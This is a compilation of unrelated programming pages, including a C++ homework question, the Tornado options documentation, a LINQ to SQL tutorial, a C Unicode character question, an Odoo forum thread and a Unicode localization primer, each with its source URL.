Any ideas?

Thanks,
Thomas

_______________________________________________
Sent through the nmap-dev mailing list
Archived at
http://seclists.org/nmap-dev/2011/q1/450
Ok, my assignment is to create 2 functions, then call those functions from a menu. I have the menu part, and I think my functions are numerically correct, but I get these warnings:

warning C4700: uninitialized local variable 'ci' used
warning C4700: uninitialized local variable 'cc' used

Here is the program. I can't figure out what it means --- when I run the program the menu comes up right, but it will not run the function. :/

Code:
#include <iostream>
#include <cmath>
using namespace std;

void ci2cc(double& cubinch)
{
    double cc, ci;
    cc = ci*16.387064;
} // cubic inch to cubic centimenter

void cc2ci(double& cubcent)
{
    double cc, ci;
    ci = cc/16.387064;
} // cubic centimeter to cubic inch

void main()
{
    double cubinch, cubcent;
    int select;

    do
    {
        cout << " 0 : Exit the program. \n" << " 2 : Convert Cubic inch to cc. \n"
             << " 3 : Convert cc to Cubic inch. \n";

        cout << "Please enter the selection : ";
        cin >> select;

        switch(select)
        {
        case 0 :
            cout << "Program teminates. \n";
            break;
        case 1 :
            cout << "Please enter a value in cubic inches : ";
            cin >> cubinch;
            ci2cc(cubinch);
            cout << "" << cubinch << " cubic inch = " << cubcent << " cubic centimeter " << endl;
            break;
        case 2 :
            cout << "Please enter a value in cubic centimeters : ";
            cin >> cubcent;
            cc2ci(cubcent);
            cout << "" << cubcent << " cc = " << cubinch << " Cubic inches " << endl;
            break;
        default :
            cout << "Invalid selection.\n";
        } // switch
    } while(select != 3);
} // main

Thanks in advance!
Jessica
http://cboard.cprogramming.com/cplusplus-programming/125084-help-functions.html
A command line parsing module that lets modules define their own options.

Each module defines its own options which are added to the global option namespace. However, all modules that define options must have been imported before the command line is parsed.

Your main() method can parse the command line or parse a config file with either:

tornado.options.parse_command_line()
# or
tornado.options.parse_config_file("/etc/server.conf")

Command line formats are what you would expect (--myoption=myvalue). Config files are just Python files. Global names become options, e.g.:

myoption = "myvalue"
myotheroption = "myothervalue"

We support datetimes, timedeltas, ints, and floats (just pass a type kwarg to define). We also accept multi-value options. See the documentation for define() below.

tornado.options.options is a singleton instance of OptionParser, and the top-level functions in this module (define, parse_command_line, etc) simply call methods on it. You may create additional OptionParser instances to define isolated sets of options, such as for subcommands.

tornado.options.define: Defines an option in the global namespace. See OptionParser.define.

tornado.options.options: Global options object. All defined options are available as attributes on this object.

tornado.options.parse_command_line: Parses global options from the command line. See OptionParser.parse_command_line.

tornado.options.parse_config_file: Parses global options from a config file. See OptionParser.parse_config_file.

tornado.options.print_help: Prints all the command line options to stderr (or another file). See OptionParser.print_help.

tornado.options.add_parse_callback: Adds a parse callback, to be invoked when option parsing is done. See OptionParser.add_parse_callback.

tornado.options.Error: Exception raised by errors in the options module.

class OptionParser: A collection of options, a dictionary with object-like access. Normally accessed via static functions in the tornado.options module, which reference a global instance.

OptionParser.add_parse_callback: Adds a parse callback, to be invoked when option parsing is done.

OptionParser.define: Defines a new command line option. By default, command line options are grouped by the file in which they are defined. Command line option names must be unique globally.
They can be parsed from the command line with parse_command_line or parsed from a config file with parse_config_file. If a callback is given, it will be run with the new value whenever the option is changed. This can be used to combine command-line and file-based options: define("config", type=str, help="path to config file", callback=lambda path: parse_config_file(path, final=False)) With this definition, options in the file specified by --config will override options set earlier on the command line, but can be overridden by later flags. Returns a wrapper around self that is compatible with mock.patch. The mock.patch function (included in the standard library unittest.mock package since Python 3.3, or in the third-party mock package for older versions of Python) is incompatible with objects like options that override __getattr__ and __setattr__. This function returns an object that can be used with mock.patch.object to modify option values: with mock.patch.object(options.mockable(), 'name', value): assert options.name == value Parses all options given on the command line (defaults to sys.argv). Note that args[0] is ignored since it is the program name in sys.argv. We return a list of all arguments that are not parsed as options. If final is False, parse callbacks will not be run. This is useful for applications that wish to combine configurations from multiple sources. Parses and loads the Python config file at the given path. If final is False, parse callbacks will not be run. This is useful for applications that wish to combine configurations from multiple sources. Prints all the command line options to stderr (or another file).
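The define/parse flow described above can be emulated in a few lines of plain Python. This is a simplified sketch of the pattern, not tornado's actual implementation, and the class name is mine:

```python
class MiniOptions:
    """Toy version of tornado.options: define() registers options,
    parse_command_line() fills them from --name=value arguments."""

    def __init__(self):
        self._options = {}

    def define(self, name, default=None, type=str):
        self._options[name] = {"value": default, "type": type}

    def parse_command_line(self, args):
        remaining = []
        for arg in args:
            if arg.startswith("--") and "=" in arg:
                name, _, raw = arg[2:].partition("=")
                opt = self._options[name]        # KeyError for unknown options
                opt["value"] = opt["type"](raw)  # coerce, as tornado does per type
            else:
                remaining.append(arg)            # non-option arguments are returned
        return remaining

    def __getattr__(self, name):
        # attribute-style access to option values, like options.port
        try:
            return self._options[name]["value"]
        except KeyError:
            raise AttributeError(name)

options = MiniOptions()
options.define("port", default=8888, type=int)
rest = options.parse_command_line(["serve", "--port=9000"])
print(options.port, rest)  # 9000 ['serve']
```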
http://www.tornadoweb.org/en/branch3.0/options.html
Microsoft enters the ORM (Object Relational Mapping) world with the introduction of LINQ (Language Integrated Query). This is provided as a built-in feature in Visual Studio 2008 and the .NET Framework 3.5, which was released to the public on November 19, 2007.

Like most ORM data models, LINQ offers the ability to work with databases and other forms of data stores (such as XML) as pure objects. For example, if your data store is a SQL Server relational database, then LINQ will convert your tables into objects called Entities and treat the table fields as Properties. LINQ also provides full support for your stored procedures by using them as Methods (providing functionality for your objects).

So why would anybody want to use LINQ? Well, in most cases today, if you want to provide data to your objects, you would do the following steps. Assuming you have an ADO.NET wrapper called ADOSqlHelper, your code might look similar to this:

string conStr = "";
DataSet ds = ADOSqlHelper.GetDataSource(conStr, "SELECT * FROM Customers");
GridView1.DataSource = ds.Tables[0];
GridView1.DataBind();

Not that there is anything wrong with doing it that way, but using LINQ offers an alternative. Once you have defined a LINQ object model using the designer palette in Visual Studio 2008, populating the GridView control with data is reduced to a couple of statements using new C# syntax:

GridView1.DataSource = from cust in Customers select cust;
GridView1.DataBind();

In addition to that, LINQ takes care of the behind-the-scenes plumbing for you. It even takes care of writing the code for Inserting, Updating, and Deleting the data.

In this article you will learn how to use LINQ through a step-by-step example of creating a basic website that accesses data using LINQ. I have provided the sample demonstration web application as a zip file. Please read the Application Requirements section below for instructions on how to install and use it.
I am by no means a LINQ expert and there is so much to learn about LINQ. This article serves only as an introduction. For more information please visit.

The Northwind LINQ Web Application is a demo ASP.NET web application written in Visual Studio 2008 (C#) on top of the .NET Framework 3.5. It consists of two major functionalities as displayed in the main screen below:

When you select the link View and Manage Northwind Customers you are presented with a page that displays the list of customers from the Northwind Microsoft SQL Server sample database. From that page you have functionalities to Add, Edit, and Delete customers. See screen shot below.

When you select the link View Northwind Suppliers and their Products from the main screen you are presented with a page that displays the list of suppliers and their products.

The goal is to implement these functionalities for the demo application using LINQ as an ORM. To do this a Visual Studio 2008 solution with two projects will be created. The first project is a class library to hold our data model. The second project is an ASP.NET web application that contains the pages that will consume the object data model created in the class library project.

To start developing the LINQ data model we create a new project that is a class library project type. See screen shot below.

Next we add a new LINQ to SQL item called Northwind to the project. It has an extension of DBML (short for database model). This file will serve as the container for the newly created Northwind object database model. It actually contains two panes: one for holding the Entities (tables) with their Properties (table fields), and the other to hold the Methods (optional stored procedures). See screen shot below.

LINQ needs to know which server and database to use. To do this a database connection is required. To connect to a database, in the Visual Studio 2008 designer, click on the Tools menu and select the Connect to Database… item.
It will then prompt to choose a data source as displayed in the screen shot below. Then it will give the opportunity to select the SQL Server instance and database to model against. See below.

If successfully connected to a database then the Visual Studio designer palette now includes the Server Explorer column with the selected database and its tables and stored procedures as displayed in the screen shot below.

Now it is just a matter of opening the Tables and Stored procedures folders and dragging and dropping the tables (data classes) and stored procedures (methods) to be included with the model. For this project the tables Customer, Order, Order_Detail, Supplier, and Product are dropped in the data classes pane. Also the stored procedure CustOrderHist is dropped in the methods pane. The Visual Studio window looks like the following screen.

As the screen shows, the model is presented nicely as an object relational model. The classes and their properties are displayed as boxes. Also, notice the one-to-many relationships between the classes as indicated by the arrows. Don't forget the stored procedure also shown on the right side.

That's it! The model is done and we didn't even write one line of code. Everything required to provide functionality for our web application is done (including adding, selecting, updating, and deleting data). Actually, there's a lot that took place behind the scenes, but this is beyond the scope of this article. Please visit MSDN. For now let's continue by implementing the ASP.NET web application.

It's time to start coding. Now that we have a data model that the web application can use to consume data, we can start looking at the application's functionalities. The web application must provide the following functions: view the customer listing; add, edit, and delete customers; and view the suppliers and their products.

Add a new ASP.NET Web Application project to the Visual Studio 2008 solution. Add a Reference to the data model project you created above. See screen shot below.
To save time please download and install the sample demo application zip file in order to view the ASPX and C# code files, as I will now refer to them to continue the demonstration. See requirement and installation instructions in the Introduction section above.

The CustomerListing.aspx file contains a GridView control which is used to bind to the Customers object we created in the data model. The code-behind located in the CustomerListing.aspx.cs file contains the following code snippet:

NorthwindDataContext db = new NorthwindDataContext();
var customers = from c in db.Customers select c;
grdCust.DataSource = customers;
grdCust.DataBind();

After referencing the data model class library into your ASP.NET web project, in order to start using its objects, you must create a new instance of the DataContext class. This class is the heart of LINQ. It is the main object through which you retrieve data from the database and submit changes back. It serves as the translator for the application request into the SQL queries. Notice the new C# syntax of the .NET Framework 3.5. With a new DataContext instance, all of the objects and methods are available for you to query. Intellisense makes it very easy to use. See the screen shot below.

To get the list, simply declare a variable (using var) and set it to the query statement "from c in db.Customers select c;". Then set the GridView's DataSource property to the variable and call its DataBind method.
Adding a new customer to the Northwind database is just as simple. The web form file CustomerAdd.aspx contains three TextBox controls that are used to hold the three input values: Customer ID, Company Name, and Contact Name. The C# code-behind file CustomerAdd.aspx.cs provides the LINQ syntax required to create a new record in the Customers table:

NorthwindDataContext db = new NorthwindDataContext();
Customer customer = new Customer();

customer.CustomerID = txtCustomerID.Text.Trim();
customer.CompanyName = txtCompanyName.Text.Trim();
customer.ContactName = txtContactName.Text.Trim();

db.Customers.InsertOnSubmit(customer);
db.SubmitChanges();

First create a new instance of the NorthwindDataContext object. Then create a new customer using the Customer object. Set the customer's properties (CustomerID, CompanyName, and ContactName) to the TextBox controls. Then call the InsertOnSubmit method passing it the customer object as the parameter holding the data to be inserted into the database. In order for the changes to take effect, the SubmitChanges method must be called. That's it! You don't have to worry about database connections, writing queries, and so on.

Updating a customer record is very similar to adding a new record. Please refer to the CustomerEdit.aspx and CustomerEdit.aspx.cs to view the layout of the web page.

//get the customer id that we want to edit from query string;
string customerID = Request.QueryString["customerID"].ToString();

//Use LINQ syntax to get customerID's data to be edited
NorthwindDataContext db = new NorthwindDataContext();
Customer customer = db.Customers.Single(c => c.CustomerID == customerID);

//set the customer properties to the text box controls
customer.CompanyName = txtCompanyName.Text;
customer.ContactName = txtContactName.Text;

//submit changes to take effect
db.SubmitChanges();

First get the customer ID from the Http request QueryString variable. Next use a DataContext instance to return a Single record from the Customers object for that customer. Then set the values of the customer object to the TextBox control's Text property. Finally, call the SubmitChanges method so the changes can take effect.
Deleting a customer is very similar to updating a customer. Refer to the CustomerDelete.aspx and CustomerDelete.aspx.cs files to view the layout of the web page.

string custID = "";
if (Request["CustomerID"] != null)
    custID = Request["CustomerID"].ToString();

if (custID.Length != 0)
{
    NorthwindDataContext db = new NorthwindDataContext();
    Customer customer = db.Customers.Single(c => c.CustomerID == custID);
    db.Customers.DeleteOnSubmit(customer);
    db.SubmitChanges();
}

First get the customer ID from the Http request QueryString variable. Next use a DataContext instance to return a Single record from the Customers object for the customer. Then call the DeleteOnSubmit method of the Customers object. Finally, call the SubmitChanges method so the command can take effect.

Displaying the supplier listing is a bit more complicated because it involves displaying a GridView control as a column of another GridView control. Refer to the SupplierListing.aspx and SupplierListing.aspx.cs files to see the layout of the page. A partial showing of the ASPX file is displayed below (some attributes were lost in extraction):

<asp:GridView
  <Columns>
    <asp:BoundField
    <asp:BoundField
    <asp:BoundField
    <asp:TemplateField
      <ItemTemplate>
        <asp:GridView ID="GridView1" AutoGenerateColumns="false" runat="server"
          DataSource='<%# GetSupplierProducts( (int)DataBinder.Eval(Container.DataItem, "SupplierID") ) %>'>
          <Columns>
            <asp:BoundField
            <asp:BoundField
          </Columns>
        </asp:GridView>
      </ItemTemplate>
    </asp:TemplateField>
  </Columns>
</asp:GridView>

As you can see, the GridView control with ID grdSuppliers contains three BoundField columns and one TemplateField column. The TemplateField column is a GridView control with two columns representing the product ID and the product name. The DataSource for this GridView is set to a method called GetSupplierProducts which returns an IQueryable<Product> (a collection in the object model). The implementation method is presented below.
public IQueryable<Product> GetSupplierProducts(int supplierID)
{
    NorthwindDataContext db = new NorthwindDataContext();
    var products = from p in db.Products
                   where p.SupplierID == supplierID
                   select p;
    return (products);
}

This method takes an integer parameter which is the expected supplier ID. The supplier ID is obtained using DataBinder.Eval, an ASP.NET static method that is used to evaluate a data-binding expression at runtime. Next, the GridView control with ID grdSuppliers is populated using the following syntax:

NorthwindDataContext db = new NorthwindDataContext();
var supplier = from s in db.Suppliers select s;

//set and bind LINQ source to datagrid control
grdSuppliers.DataSource = supplier;
grdSuppliers.DataBind();

In this article we introduced LINQ (Language Integrated Query) as an ORM (Object Relational Model). We defined it as a data access method presented as an object data model converted from a SQL Server database. It is built into Visual Studio 2008 and the new .NET Framework 3.5. We explained how it is used through a sample Visual Studio 2008 project solution by creating 2 projects: the data model and an ASP.NET web application. The data model provided all the functionalities that were required for the web application, including retrieving data, adding data, updating data, and deleting data. And we didn't have to write a single line of ADO.NET data access code. We also looked at some of the new C# integrated query language syntax. There is a bit of a learning curve. To start using the data model we saw that it must first be referenced into a project. After that a new instance of the DataContext can be created in order to have access to all of the objects and methods available to us.
https://www.codeproject.com/Articles/22552/Visual-Studio-2008-Does-ORM-with-LINQ?fid=958168&df=90&mpp=10&sort=Position&spc=None&tid=2373385
I would like to store a character (in order to compare it with other characters). If I declare the variable like this : char c = 'é'; everything works well, but I get these warnings : warning: multi-character character constant [-Wmultichar] char c = 'é'; ^ ii.c:12:3: warning: overflow in implicit constant conversion [-Woverflow] char c = 'é'; I think I understand why there is these warnings, but I wonder why does it still work? And should I define it like this : int d = 'é'; although it takes more space in memory? Moreover, I also get the warning below with this declaration : warning: multi-character character constant [-Wmultichar] int d = 'é'; Do I miss something? Thanks ;) é has the Unicode code point 0xE9, the UTF-8 encoding is "\xc3\xa9". I assume your source file is encoded in UTF-8, so char c = 'é'; is (roughly) equivalent to char c = '\xc3\xa9'; How such character constants are treated is implementation-defined. For GCC:'). Hence, 'é' has the value 0xC3A9, which fits into an int (at least for 32-bit int), but not into an (8-bit) char, so the conversion to char is again implementation-defined: For conversion to a type of width N, the value is reduced modulo 2N to be within range of the type; no signal is raised. This gives (with signed char) #include <stdio.h> int main(void) { printf("%d %d\n", 'é', (char)'é'); if((char)'é' == (char)'©') puts("(char)'é' == (char)'©'"); } Output: 50089 -87 (char)'é' == (char)'©' 50089 is 0xC3A9, 87 is 0xA9. So you lose information when storing é into a char (there are characters like © which compare equal to é). You can wchar_t, an implementation-dependent wide character type which is 4 byte on Linux holding UTF-32: wchar_t c = L'é';. 
You can convert wide characters to the locale-specific multibyte encoding (probably UTF-8, but you'll need to set the locale first, see setlocale; note that changing the locale may change the behaviour of functions like isalpha or printf) with wcrtomb, or use them directly, together with wide strings (use the L prefix to get wide character string literals). Alternatively, stay with narrow strings: const char *c = "é"; or const char *c = "\u00e9"; or const char *c = "\xc3\xa9"; with possibly different semantics (for C11, perhaps also look at UTF-8 string literals and the u8 prefix). Note that file streams have an orientation (cf. fwide). HTH

Try using wchar_t rather than char. char is a single byte, which is appropriate for ASCII but not for multi-byte character sets such as UTF-8. Also, flag your character literal as being a wide character rather than a narrow character:

```c
#include <wchar.h>
...
wchar_t c = L'é';
```
http://www.dlxedu.com/askdetail/3/2754d688f398f4de4608ceca53ad7a91.html
Opaque data type to pass values of any type across boundaries.

#include <DT_Plugin.h>

Opaque data type to pass values of any type across boundaries. Definition at line 115 of file DT_Plugin.h.

Create a new, empty DT_Value object. A value can be assigned to it later using the assignment operator. Definition at line 120 of file DT_Plugin.h.

Create a new DT_Value from the given value. A copy of the incoming value will be stored, rather than a reference to it. Definition at line 125 of file DT_Plugin.h.

Reset the DT_Value object to be empty. Definition at line 143 of file DT_Plugin.h.

An explicit copy function to copy in a new DT_Value. The call is explicit, rather than using the implicit assignment operator, to avoid arbitrary copying, which can get expensive for large objects. Definition at line 139 of file DT_Plugin.h.

Return a reference to the value contained within. It is important that the type matches, otherwise an exception is thrown. Definition at line 157 of file DT_Plugin.h.

Assign a new value to this DT_Value. Any previous value will be destroyed, and a copy made of the incoming value. Definition at line 130 of file DT_Plugin.h.
http://www.sidefx.com/docs/hdk/class_d_t___value.html
How do I use a field created in sale.order and display it in stock.picking.out

Could someone please spell this out for me in plain English - I want to display a field from sale.order in stock.picking.out. I have searched for ages now and found many answers, but because my programming skills are very limited and the people who answer the questions are experts, the answers tend to leave me spinning!

I have created my first module - chuffed as chips! The module allows the salesman to identify the type of packaging needed for the order.

```python
from osv import osv, fields

class sale_packaging_type_field(osv.osv):
    _inherit = 'sale.order'
    _columns = {
        'sale_packaging_type': fields.selection(
            (('our', 'Our Packaging'), ('unmark', 'Unmarked Packaging')),
            'Sale Packaging Type'),
    }
    _defaults = {
        'sale_packaging_type': 'a',
    }
```

and the XML view for sale.order:

```xml
<openerp>
  <data>
    <record model="ir.ui.view" id="sale_packaging_type_field">
      <field name="name">sale.order.form</field>
      <field name="model">sale.order</field>
      <!-- Inherits from base.view_partner_form -->
      <field name="inherit_id" ref="sale.view_order_form" />
      <field name="arch" type="xml">
        <!-- Add the textual field after the website field -->
        <field name="partner_shipping_id" position="after">
          <field name="sale_packaging_type" />
        </field>
      </field>
    </record>
  </data>
</openerp>
```

This works great!
:) So now I'm trying to display the field sale_packaging_type in stock.picking.out using sale_id as the link (so the store man knows how to package the order):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<openerp>
  <data>
    <record model="ir.ui.view" id="sale_packaging_type_out_field">
      <field name="name">stock.picking.out.form</field>
      <field name="model">stock.picking.out</field>
      <!-- Inherits from base.view_partner_form -->
      <field name="inherit_id" ref="stock.view_picking_out_form" />
      <field name="arch" type="xml">
        <!-- Add the textual field after the website field -->
        <field name="stock_journal_id" position="after">
          <!-- Creates an on-screen link that the store man can follow -
               not checked whether he has permission yet -->
          <field name="sale_id" />
        </field>
      </field>
    </record>
  </data>
</openerp>
```

This works as far as displaying sale_id and creating a link.

Questions

1) Is there a way to display sale_packaging_type from sale.order using sale_id and only this XML - maybe something similar to what I would use in an RML report? - Yes or No please? ..... If Yes, how please? - I've tried this... but it doesn't work: sale_id.sale_packaging_type

2) If No, then do I have to create a new class and related field? - Yes or No please? ..... If Yes, I'll try to do it myself - only way to learn! - I'll post my results later for marking by the community!

3) If No, guidance please?

You have to inherit the stock picking as well for you to do this, not just the sale order:

```python
class stock_move(osv.osv):
    _name = 'stock.move'
    _inherit = 'stock.move'
    _columns = {
        'sale_packaging_type': xxxxx,
    }
stock_move()
```

Plus you might need to create an onchange function in your stock_move as well for the field to be carried along when the sale order is confirmed. You need to make your field selectable in the stock move page, assuming a delivery is to be carried out for a product that was not generated from a sales order (I think). If your field is not in the stock picking, what happens to your field when one clicks "create new" in stock picking?
This might give you an error.

Your code has dragged up a couple more questions. You use _name as per the technical memento, which states it is compulsory. You also call the class stock_move() - which I have also seen, but if I do it, it crashes! Any answers? - are these related - i.e. does it crash because I don't name it?

This is my email: dkaiyewu@fastmail.fm. Send me a mail and I will send you a module which might be of help. (PS no money involved)

Hello,

- To display sale_packaging_type in the view you have to create a related field in stock.picking. In the RML report of the picking you can use [[ picking.sale_id and picking.sale_id.sale_packaging_type or '' ]] to display your field - no related field is required for RML.
- Yes, you need a related field for views.

It is much easier to create 2 products, one "our" and one "unmark", for every product. This method would require little to no custom programming. If you don't like the solution of 2 products, I would suggest that you create a related field in stock.picking that looks up the sale_packaging_type and displays it at the top of the sheet, as Andreas suggested. Don't bother with stock.move unless you need to itemize the packaging for every product you are selling.

Many thanks, but I only told you half the story - in trying to keep it simple I simplified the code. Our selection criteria actually has 7 options, hence the product list would grow 7-fold. But it may be an option for someone else. Half the problem is understanding which bit does what to another bit, but I guess that's part of the fun of coding.
https://www.odoo.com/forum/help-1/question/how-do-i-use-a-field-created-in-sale-order-and-display-it-stock-picking-out-32269
On Saturday, 21 April 2007 at 01:00 +0200, Nicolas Mailhot wrote:
> On Friday, 20 April 2007 at 23:18 +0200, Martin Sourada wrote:
>
> > I noticed that in inkscape you have two choices of how to save an image to svg:
> > "Inkscape SVG" and "Plain SVG". "Inkscape SVG" is the default option, whereas "Plain
> > SVG" seems to be the better option for previews in nautilus. So I save all my icons
> > in "Plain SVG" format. Dunno however where's the difference.
>
> It will probably strip all non-standard elements like the attached
> scriptable filter (that won't remove the svg qualifiers or recent adobe
> files because as far as I can tell it's legit and tools should not choke
> on it)

And this one will make the svg namespace implicit when possible, making nautilus happy (nautilus is still broken though). It may complain a bit on the many interesting echo xml files but will output a sane result.

-- Nicolas Mailhot

Attachment: svg-cleanup.xsl
Description: application/xml

Attachment: signature.asc
Description: This is a digitally signed message part
https://www.redhat.com/archives/fedora-art-list/2007-April/msg00106.html
Foreword — Acknowledgements — Introduction — Localization Efforts in the Asia-Pacific — Recommendations — Annex A: Key Concepts — Annex B: Technical Aspects — Further Reading — Resources and Tools — Glossary — About the Authors — About APDIP — About IOSN

In this annex, more technical details will be discussed. The aim is to give implementers the necessary information to start localization. However, this is not intended to be a hands-on cookbook.

Unicode

Planes

A Unicode code point is a numeric value between 0 and 10FFFF, divided into planes of 64K characters. In Unicode 4.0, the allocated planes are Planes 0, 1, 2 and 14. Plane 0, ranging from 0000 to FFFF, is called the Basic Multilingual Plane (BMP), which is the set of characters assigned by the previous 16-bit scheme. There are two more reserved planes, Plane 15 and Plane 16, for private use, where no code point is assigned.

Basic Multilingual Plane

The Basic Multilingual Plane (BMP), or Plane 0, is the most commonly used in general documents. Code points are allocated for common characters in contemporary scripts, with exactly the same set as ISO/IEC 10646-1, as summarized in Figure 2. Note that the code points between E000 and F900 are reserved for vendors' private use. No character is assigned in this area.

Character Encoding

There are several ways of encoding Unicode strings for information interchange. One may simply represent each character using a fixed-size integer (called wide char), which is defined by ISO/IEC 10646 as UCS-2 and UCS-4, where 2-byte and 4-byte integers are used, respectively, [1] and where UCS-2 is for BMP only. But the common practice is to encode the characters using variable-length sequences of integers called UTF-8, UTF-16 and UTF-32 for 8-bit, 16-bit and 32-bit integers, respectively. [2] There is also UTF-7 for e-mail transmissions that are 7-bit strict, but UTF-8 is safe in most cases.

UTF-32

UTF-32 is the simplest Unicode encoding form.
Each Unicode code point is represented directly by a single 32-bit unsigned integer. It is therefore a fixed-width character encoding form. This makes UTF-32 an ideal form for APIs that pass single character values. However, it is inefficient in terms of storage for Unicode strings.

UTF-16

UTF-16 encodes code points in the range 0000 to FFFF (i.e. BMP) as a single 16-bit unsigned integer. Code points in supplementary planes are instead represented as pairs of 16-bit unsigned integers. These pairs of code units are called surrogate pairs. The values used for the surrogate pairs are in the range D800 - DFFF, which are not assigned to any character, so UTF-16 readers can easily distinguish between single code units and surrogate pairs. The Unicode Standard [3] provides more details of surrogates. UTF-16 is a good choice for keeping general Unicode strings, as it is optimized for characters in BMP, which is used in 99 percent of Unicode texts. It consumes about half of the storage required by UTF-32.

UTF-8

To meet the requirements of legacy byte-oriented ASCII-based systems, UTF-8 is defined as a variable-width encoding form that preserves ASCII compatibility. It uses one to four 8-bit code units to represent a Unicode character, depending on the code point value. The code points between 0000 and 007F are encoded in a single byte, making any ASCII string a valid UTF-8 string. Beyond the ASCII range of Unicode, some non-ideographic characters between 0080 and 07FF are encoded with two bytes. Then, Indic scripts and CJK ideographs between 0800 and FFFF are encoded with three bytes. Supplementary characters beyond BMP require four bytes. The Unicode Standard [4] provides more details of UTF-8. UTF-8 is typically the preferred encoding form for the Internet. The ASCII compatibility helps a lot in migration from old systems. UTF-8 also has the advantage of being byte-serialized and friendly to C and other programming languages' APIs.
For example, the traditional string collation using byte-wise comparison works with UTF-8. In short, UTF-8 is the most widely adopted encoding form of Unicode.

Character Properties

In addition to code points, Unicode also provides a database of character properties called the Unicode Character Database (UCD), [5] which consists of a set of files describing the following properties:

- Name.
- General category (classification as letters, numbers, symbols, punctuation, etc.).
- Other important general characteristics (white space, dash, ideographic, alphabetic, non character, deprecated, etc.).
- Character shaping (bidi category, shaping, mirroring, width, etc.).
- Case (upper, lower, title, folding; both simple and full).
- Numeric values and types (for digits).
- Script and block.
- Normalization properties (decompositions, decomposition type, canonical combining class, composition exclusions, etc.).
- Age (version of the standard in which the code point was first designated).
- Boundaries (grapheme cluster, word, line and sentence).
- Standardized variants.

The database is useful for Unicode implementation in general. It is available at the Unicode.org Web site. The Unicode Standard [6] provides more details of the database.

Technical Reports

In addition to the code points, encoding forms and character properties, Unicode also provides some technical reports that can serve as implementation guidelines. Some of these reports have been included as annexes to the Unicode standard, and some are published individually as Technical Standards. In Unicode 4.0, the standard annexes are:

- UAX 9: The Bidirectional Algorithm - Specifications for the positioning of characters flowing from right to left, such as Arabic or Hebrew.
- UAX 11: East-Asian Width - Specifications of an informative property of Unicode characters that is useful when interoperating with East-Asian legacy character sets.
- UAX 14: Line Breaking Properties - Specification of line breaking properties for Unicode characters as well as a model algorithm for determining line break opportunities.
- UAX 15: Unicode Normalization Forms - Specifications for four normalized forms of Unicode text. With these forms, equivalent text (canonical or compatibility) will have identical binary representations. When implementations keep strings in a normalized form, they can be assured that equivalent strings have a unique binary representation.
- UAX 24: Script Names - Assignment of script names to all Unicode code points. This information is useful in mechanisms such as regular expressions, where it produces much better results than simple matches on block names.
- UAX 29: Text Boundaries - Guidelines for determining default boundaries between certain significant text elements: grapheme clusters ("user characters"), words and sentences.

The individual technical standards are:

- UTS 6: A Standard Compression Scheme for Unicode - Specifications of a compression scheme for Unicode and a sample implementation.
- UTS 10: Unicode Collation Algorithm - Specifications for how to compare two Unicode strings while conforming to the requirements of the Unicode Standard. The UCA also supplies the Default Unicode Collation Element Table (DUCET) as the data specifying the default collation order for all Unicode characters.
- UTS 18: Unicode Regular Expression Guidelines - Guidelines on how to adapt regular expression engines to use Unicode.

All Unicode Technical Reports are accessible from the Unicode.org Web site. [7]

Fonts

Font Development Tools

Some FOSS tools for developing fonts are available. Although not as many as their proprietary counterparts, they are adequate to get the job done, and are continuously being improved. Some interesting examples are:

- XmBDFEd [8] - Developed by Mark Leisher, XmBDFEd is a Motif-based tool for developing BDF fonts.
It allows one to edit bit-map glyphs of a font, do some simple transformations on the glyphs, transfer information between different fonts, and so on.
- FontForge (formerly PfaEdit [9] ) - Developed by George Williams, FontForge is a tool for developing outline fonts, including Postscript Type1, TrueType, and OpenType. Scanned images of letters can be imported and their outline vectors automatically traced. The splines can be edited, and transformations like skewing, scaling, rotating, thickening may be applied, and much more. It provides sufficient functionality for editing Type1 and TrueType font properties. OpenType tables can also be edited in its recent versions. One weak point, however, is hinting: it preserves the quality of Type1 hints, but not of TrueType hints.
- TTX/FontTools [10] - Just van Rossum's TTX/FontTools is a tool to convert OpenType and TrueType fonts to and from XML. FontTools is a library for manipulating fonts, written in Python. It supports TrueType, OpenType, AFM and, to a certain extent, Type 1 and some Mac-specific formats. It allows one to dump OpenType tables, examine and edit them with an XML or plain text editor, and merge them back into the font.

Font Configuration

There have been several font configuration systems available in GNU/Linux desktops. The most fundamental one is the X Window font system itself. But, due to some recent developments, another font configuration called fontconfig has been developed to serve some specific requirements of modern desktops. These two font configurations will be discussed briefly. First, however, let us briefly discuss the X Window architecture, to understand font systems. X Window [11] is a client-server system. X servers are the agents that provide services to control hardware devices, such as video cards, monitors, keyboards, mice or tablets, and to pass input events to clients. In this client-server architecture, fonts are provided on the server side.
Thus, installing fonts means configuring the X server by installing fonts and registering them in its font path. However, since an X server is sometimes used to provide thin-client access in some deployments, where it may run on cheap PCs booted by floppy or across the network, or even from ROM, font installation on each X server is not always appropriate. Thus, font service has been delegated to a separate service called the X Font Server (XFS). Another machine in the network can be dedicated to font service so that all X servers can request font information from it. Therefore, with this structure, an X server may be configured to manage fonts by itself, to use fonts from the font server, or both. Nevertheless, recent changes in XFree86 have addressed some requirements to manage fonts on the client side. The Xft extension provides anti-aliased glyph images using font information provided by the X client. Along with this, the first version of the Xft extension also provided font management functionality to X clients; this functionality was later split out as a separate library called fontconfig in Xft2. fontconfig is a font management system independent of X, which means it can also apply to non-GUI applications such as printing services. Modern desktops, including KDE 3 and GNOME 2, have adopted fontconfig as their font management system, and have benefited from closer integration in providing an easy font installation process. Moreover, client-side fonts also allow applications to do all glyph manipulations, such as making special effects, while enjoying a consistent appearance on screen and in printed output. The X client-server split is rarely visible on stand-alone desktops. However, it is important to always keep the split in mind, to enable particular features.

Output Methods

Since the usefulness of XOM is still being questioned, we shall discuss only the output methods already implemented in the two major toolkits: Pango of GTK+ and Qt.
Pango Text Layout Engines

Pango ['Pan' means 'all' in Greek and 'go' means 'language' in Japanese] [12] is a multilingual text layout engine designed for quality text typesetting. Although it is the text drawing engine of GTK+, it can also be used outside GTK+ for other purposes, such as printing. [13] This section will provide localizers with a bird's eye view of Pango. The Pango reference manual [14] should be consulted for more detail.

PangoLayout

At a high level, Pango provides the PangoLayout class, which takes care of typesetting text in a column of a given width, as well as other information necessary for editing, such as cursor positions. Its features may be summarized as follows:

Paragraph Properties
- indent
- spacing
- alignment
- justification
- word/character wrapping modes
- tabs

Text Elements
- get lines and their extents
- get runs and their extents
- character search at (x, y) position
- character logical attributes (is line break, is cursor position, etc.)
- cursor movements

Text Contents
- plain text
- markup text

Middle-level Processing

Pango also provides access to some middle-level text processing functions, although most clients in general do not use them directly. To gain a brief understanding of Pango internals, some highlights are discussed here. There are three major steps for text processing in Pango: [15]

